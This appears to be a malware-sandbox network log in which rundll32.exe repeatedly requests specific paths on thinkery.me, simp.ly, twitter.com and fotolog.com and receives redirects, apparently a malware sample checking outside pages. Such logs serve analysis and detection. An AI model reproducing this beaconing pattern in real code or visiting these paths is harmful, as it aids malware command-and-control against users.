                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:33.618799925 CET2041INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:33 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                33192.168.2.649802192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:34.410227060 CET2052OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:34.579742908 CET2052INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:34 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                34192.168.2.649804104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:35.392251015 CET2061OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:35.563349962 CET2062INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:35 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_xZ6RXjD0v68PZebcP4dlhg=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:35 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403387549363368; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:35 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 2a3190fec1ab0bbe2e59e7845b029232
                                                                                                                                                x-response-time: 115


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                35192.168.2.649807172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:36.394046068 CET2073OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:36.871387959 CET2074INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:36 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:36 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d838dd100004c9e420f7000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fb%2Bbx%2B1pHdBO0bMnJSaLvwl2J972lwMVYLsNu%2BCRGNQBZYhM3kpQefIhD6FeFnx6fyPdppy9twWl5%2B8N0FKCiWv2oD0o1SlVVofEhP9MpIE%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3b8fbda64c9e-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                36192.168.2.6498095.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:37.731024027 CET2105OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:37.804403067 CET2105INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                37192.168.2.649811192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:38.564830065 CET2116OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:38.732558966 CET2117INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:38 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                38192.168.2.649813104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:39.438502073 CET2122OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:39.607686996 CET2123INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:39 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_0WgOUPdUWsxYF+relnwzYQ=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:39 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403387953919644; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:39 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 686e18591c2be0e201f189ee55cb9715
                                                                                                                                                x-response-time: 113


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                39192.168.2.649816172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:40.342509031 CET2135OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:40.807472944 CET2196INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:40 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:40 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d839d3b0000c7913a9be000000001
                                                                                                                                                Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=S3A%2BIOPwjDtEgkBPXgihHMmbY7nBssA7eP9h3sXYabeJW75trxwfDKtOdjwN%2FndyCvFsJiy0BiLwH1l%2Bh31OghNjCbxQGRDJ1hngIuLrdN0%3D"}]}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3ba85c91c791-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                4192.168.2.6497315.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:02.304267883 CET1391OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:02.372733116 CET1391INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:02 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                40192.168.2.6498215.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:41.654105902 CET2338OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:41.725047112 CET2339INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:41 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                41192.168.2.649825192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:42.492003918 CET2415OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:42.663991928 CET2442INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:42 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                42192.168.2.649828104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:43.355197906 CET2525OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:43.527904987 CET2533INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:43 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_pvuJTSsszVyQ9wtBUKLIuQ=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:43 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403388345671082; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:43 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 6633396dac58714a06f76a43dc42de62
                                                                                                                                                x-response-time: 114


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                43192.168.2.649834172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:44.254414082 CET2644OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:44.737943888 CET2820INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:44 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                x-powered-by: PHP/7.4.15
                                                                                                                                                x-powered-by: PleskLin
                                                                                                                                                expires: Mon, 22 Feb 2021 23:44:44 GMT
                                                                                                                                                cache-control: max-age=3600
                                                                                                                                                x-redirect-by: WordPress
                                                                                                                                                location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83ac8700000b43a4381000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uLoWjYa0LO12SEZlgO9OesFDe%2By0VVMsFWLRw%2F4Qa1L1RFPVElJbHtylOI3teSb4khMvd4zXwSa0ktRyqkRvIzJOHw3S9FoQvc2cTS772j4%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3bc0de1e0b43-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                44192.168.2.6498385.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:45.717900991 CET3075OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:45.791501045 CET3087INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:45 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                45192.168.2.649841192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:46.542150021 CET3186OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:46.711659908 CET3187INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:46 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                46192.168.2.649844104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:47.893156052 CET3232OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:48.065778971 CET3232INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:44:48 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_I8NGpB7rpqvcpflKPVh79A=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:47 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403388799512396; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:44:47 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 6ffbcb5b66055354c477b54775844195
                                                                                                                                                x-response-time: 114


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                47192.168.2.649847172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:49.774094105 CET3244OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:44:50.331021070 CET3245INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:50 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:44:50 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d83c21600009d1265939000000001
                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Q6p7x5%2Fq2W5i5ExeJ7MrKZjaqEKVBkFznE3EwyKXUjeRIVrVyPxOp1YbSEtCGceV%2BJe3ZelYlLBwvRMc0aC0M8cvu5XpPMmICkKS8u7QlZM%3D"}],"max_age":604800}
                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3be35dd09d12-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                48192.168.2.6498495.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:44:51.230042934 CET3294OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:44:51.302983046 CET3294INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:44:51 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
